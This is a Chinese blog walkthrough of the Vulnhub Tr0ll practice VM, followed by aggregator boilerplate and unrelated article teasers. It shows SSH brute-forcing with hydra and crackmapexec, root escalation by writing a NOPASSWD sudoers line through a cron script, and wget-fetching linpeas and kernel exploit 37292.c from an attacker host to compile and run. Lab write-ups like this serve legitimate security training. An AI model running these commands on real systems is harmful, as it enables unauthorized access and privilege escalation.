Vulnhub Tr0ll

news/2024/11/30 0:19:46/文章来源:https://www.cnblogs.com/kelec0ka/p/18568850

0x01:端口扫描

主机发现

nmap -sn 192.168.231.0/24

image-20241120173342687

IP地址为192.168.231.137

全端口扫描

nmap --min-rate 10000 -p- 192.168.231.137

image-20241120173533581

开放了21ftp,22ssh,80http

UDP扫描

nmap -sU --min-rate 10000 -p- 192.168.231.137

image-20241120173837287

无UDP端口开放

接下来进行详细端口扫描

nmap -sT -sC -sV -O --min-rate 10000 -p21,22,80 192.168.231.137

image-20241120174213886

发现FTP可以匿名登录,http页面有robots.txt,web服务为Apache2.4.7

漏洞扫描

nmap --script=vuln -p21,22,80 192.168.231.137

image-20241120183628398

枚举出了一个关键目录:/secret

0x02:FTP渗透

我们匿名登陆后,先切换成binary模式

image-20241120181043049

查看当前路径和当前文件夹内容

pwd
ls -liah

image-20241120181203919

发现只有一个lol.pcap的流量包,我们把它get下来

对于在渗透测试中的流量包分析,我们一般用strings去分析他,而不是用wireshark

image-20241120181745132

对于流量包的分析,我们得到一个关键信息

secret_stuff.txt文件中,我们获得一个关键值sup3rs3cr3tdirlol

0x03:web渗透

扫目录

dirsearch -u http://192.168.231.137

image-20241125171326251

和之前目录枚举出的结果一致

image-20241125171352801

但还是没有什么可用信息

image-20241125171434094

我们再扫一遍目录

dirsearch -u 192.168.231.137/secret

没有任何结果

这时候我们想到我们之前在FTP上获取到了一串字符,现在怀疑是目录,我们试试看

image-20241125171720898

果然,我们把这个二进制文件下载下来后,查看

strings roflmao

看了一下,基本上就是这个东西了

image-20241125171949726

这玩意很抽象,谁家把二进制地址做目录啊

image-20241125172100848

image-20241125172128077

image-20241125172152349

这大概率就是ssh

我们hydra爆破

hydra -L ~/test/user.txt -P ~/test/pass.txt -Vv -t 20 192.168.231.137 ssh

image-20241125173638595

我们尝试了很多次后都不行,手动输入也不行,实在是想不到了,看了看wp发现密码居然是Pass.txt!这谁想得到

但是我们更改后发现还是爆破不出来,原因我们放在最后

我们还可以使用crackmapexec来进行爆破

crackmapexec ssh 192.168.231.137 -u user.txt -p pass.txt --continue-on-success

image-20241125174517535

发现限制了次数,我们只好调换一下顺序了,发现只有这一个用户可以正常登录

0x04:权限提升

提升交互性

/bin/bash
python -c 'import pty; pty.spawn("/bin/bash");'

信息收集

uname -a
cat /etc/issue

发现是一台Ubuntu的机子,内核版本为Linux troll 3.13.0-32-generic,操作系统为Ubuntu 14.04.1

在这个时候突然把我弹出去了

image-20241125175356587

应该是有自动任务到一定时间把我弹出去了,那我们现在考虑应该有两种提权方法

一是有自动任务,考虑自动任务提权

二是因为系统内核版本低,考虑内核提权

我们先看第一种,第二种放到最后来讲

image-20241125182447461

cat命令用不了,我们看看哪些命令具有SUID权限

find / -type f -perm -04000 -ls 2>/dev/null

image-20241125182544876

发现没有什么命令可以平替cat,那我们就换一个目录查看自动任务

find / -type f -name "cronlog" 2>/dev/null
cat /var/log/cronlog

image-20241125183015052

成功找到一个cleaner.py文件,我们定位一下

find / -type f -name "cleaner.py" 2>/dev/null

image-20241125183335834

cat /lib/log/cleaner.py

image-20241125183439849

发现这个任务会自动删除/tmp目录下的任意文件

我们在os.system处修改其内容如下进行提权

vim /lib/log/cleaner.py
echo "overflow ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

但是我发现我的kali上远程ssh连用vim会直接卡死,大哥怀疑是ssh问题,升级后第一次可以了,第二次又死了,那应该是kali或者VM的问题,还是直接用Windows吧

image-20241125205018066

等他一下,然后运行

sudo /bin/bash

成功提权

image-20241125205509811

0x05:思考总结

1.为什么crackmapexec能爆破出来,而hydra却不行呢?

首先我们通过刚才知道,他的ssh有爆破限制,crackmapexec的工作方式是每次尝试建立一个新连接的方式,而hydra的工作方式是多线程并发的方式,从而被服务器拒绝

我们刚才hydra的指令是

hydra -L ~/test/user.txt -P ~/test/pass.txt -Vv -t 20 192.168.231.137 ssh

其中-t是设置线程数,我们把它删掉

hydra -L ~/test/user.txt -P ~/test/pass.txt -Vv 192.168.231.137 ssh

image-20241125182202376

成功使用hydra爆破出来,但是直观上来看并没有crackmapexec看起来那么舒服

2.使用内核提权方法

由于我们刚才已经清除了用于删除/tmp的自动文件,所以我们接下来在tmp目录下操作

我们首先上传linpeas.sh查看

wget http://192.168.231.138:6666/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh -a > rst.txt

image-20241125211703575

有三个highly probable漏洞,我们尝试

脏牛运行不了,我们尝试第三个

wget 192.168.231.138:6666/37292.c
gcc 37292.c -o 37292
chmod 777 37292
./37292

image-20241125213412260

成功提权!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/841063.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

裁员了,很严重,大家做好准备吧!

在实际工作中,测试人需要解决的是具体的技术问题,而不仅仅是理论知识。为了全面评估候选人的能力,确保招聘到真正适合公司的人才。📝 博主首页 : 「码上生花」 ,同名公众号 :「伤心的辣条」📝 面试求职: 「面试试题小程序」 ,内容涵盖 测试基础、Linux操作系统、MyS…

IDEA如何快速地重写方法,如equals、toString等

前言 大家好,我是小徐啊。我们在使用IDEA的时候,有时候是需要重写equals和toString等方法的。这在IDEA中已经很方便的给我们准备好了快速的操作了。今天就来讲解一下。 如何重写 首先,打开要重写方法的文件,让鼠标定位到这个文件。然后,点击上方的代码,再点击重写方法这个…

高级语言程序设计课程第九次个人作业

班级:https://edu.cnblogs.com/campus/fzu/2024C 作业要求:https://edu.cnblogs.com/campus/fzu/2024C/homework/13311 学号:102400203 姓名:黄奕 14.17 3.这里定义月份名和其缩写时忘记定义长度,在第五问的时候系统报错才发现,更改在第五问float类型对应%f,我对应成%lf…

分布式一致性算法Raft

Raft算法在了解Raft之前,我们先了解一致性(Consensus)这个概念,它是指多个服务器在状态达成一致,但是在一个分布式系统中,因为各种意外可能,有的服务器可能会崩溃或变得不可靠,它就不能和其他服务器达成一致状态。这样就需要一种Consensus协议,一致性协议是为了确保容…

LeetCode24 两两交换链表中的节点

两两交换链表中的节点LeetCode24 两两交换链表中的节点 题目链接:LeetCode24 描述 给你一个链表,删除链表的倒数第 n 个结点,并且返回链表的头结点。示例输入:head = [1,2,3,4] 输出:[2,1,4,3]思路代码 class Solution {public ListNode swapPairs(ListNode head) {ListNo…

51单片机入门:LED灯控制(01)

第一篇博客,博客园注册很久却一直没有好好利用,今天把以前的文章都删掉,就当开个好头吧。 希望在以后的时间中,自己能够认真、努力、珍惜时间。 零基础入门51单片机 单片机(Microcontroller Unit,MCU)是一种集成电路芯片,它将计算机的CPU、存储器(RAM和ROM)、输入/输…

解读Graph+AI白皮书:LLM浪潮下,Graph尚有何为?

蚂蚁&之江实验室牵头的《Graph+AI:大模型浪潮下的图计算》白皮书发布,详细探讨了图计算与人工智能技术的融合发展,涵盖数据处理、算法创新、应用实践及未来挑战,强调图技术在提升模型解释性和处理复杂关系数据方面的重要性。历时半年,由蚂蚁集团和之江实验室牵头,联合…

C#/.NET/.NET Core技术前沿周刊 | 第 14 期(2024年11.18-11.24)

前言 C#/.NET/.NET Core技术前沿周刊,你的每周技术指南针!记录、追踪C#/.NET/.NET Core领域、生态的每周最新、最实用、最有价值的技术文章、社区动态、优质项目和学习资源等。让你时刻站在技术前沿,助力技术成长与视野拓宽。欢迎投稿、推荐或自荐优质文章、项目、学习资源等…

24.10.25 远程连接以及排错

一.Typora的使用 ctrl+数字 表示几级标题 ctrl+shift+[ 表示有序列表 ctrl+shift+] 表示无序列表 enter两次列表消失 英文下的点,三点bash+回车表示代码块 英文下的点,三点sh+回车表示代码块 二.VMware使用 1.VMware只能双击一次出现这个提示,表示已经打开一个…

TIA做交通信号灯练习2

今晚在昨天的基础上增加要求,三种灯在计时还剩下5秒时进行闪烁。 在昨天项目基础上新建一个FB,定义下面的变量。在此FB内部写下面的程序在OB1调用这个FB,分配参数在wincc新建变量关联TIA中的变量在WINCC画面上放置2个按钮和3个圆形,2个按钮的鼠标按下使start1和stop1为1,弹…

ISSCC2025 Computing-In-Memory Session 趋势整理

今天下午ISSCC 2025发布会开完,CIM Session花落谁家终于清楚了。今年被CIM放到了Session 14,共录取七篇,投稿数如果和去年差不多的话,那么录取率应该是进一步下降了(去年录取了九篇)。只能说体感上来说就明显越来越卷。 还是先来看一下录取的Paper:7篇都来自远东,两篇台…

Nuxt.js 应用中的 webpack:error 事件钩子

title: Nuxt.js 应用中的 webpack:error 事件钩子 date: 2024/11/25 updated: 2024/11/25 author: cmdragon excerpt: webpack:error 钩子是用于在 Webpack 编译过程中捕获和处理错误的一个重要机制。当发生编译错误时,这个钩子会被调用,通常用于在 UI 上给出反馈或者处理…